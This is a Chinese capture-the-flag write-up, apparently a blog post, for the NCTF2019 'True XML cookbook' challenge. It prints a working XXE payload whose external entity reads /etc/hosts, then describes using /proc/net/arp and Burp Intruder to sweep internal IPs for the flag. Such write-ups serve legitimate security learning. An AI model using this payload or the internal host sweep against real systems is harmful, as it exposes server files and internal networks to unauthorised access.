[NCTF2019]True XML cookbook
这道题是xml模板和xxe注入,以前没有碰到过类似知识点所以这次学习一下。

填写用户名,抓包,改包。简单来说就是把file协议读取的内容放在abc这个变量里,然后<username>&abc</username>输出abc的值。
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY abc SYSTEM "file:///etc/hosts">
]>
<user><username>&abc;</username><password>abc</password></user>


我这里并没有拿到主机的IP地址,尝试访问/proc/net/arp,拿到了内网地址

直接访问这个地址会报错,右键send to Intruder开始爆破IP地址最后一个字段查找内网中的其他主机。最后在10.0.34.6这个地址拿到相应的flag。



本文介绍了参与[NCTF2019]TrueXMLcookbook挑战的经历,涉及XML外部实体(XXE)注入技术。通过设置XML实体来读取文件,作者成功获取了/etc/hosts内容,并利用此方法在内网中寻找其他主机,最终在10.0.34.6找到flag。这是一个关于网络安全和XML漏洞利用的学习过程。
3534

被折叠的 条评论
为什么被折叠?



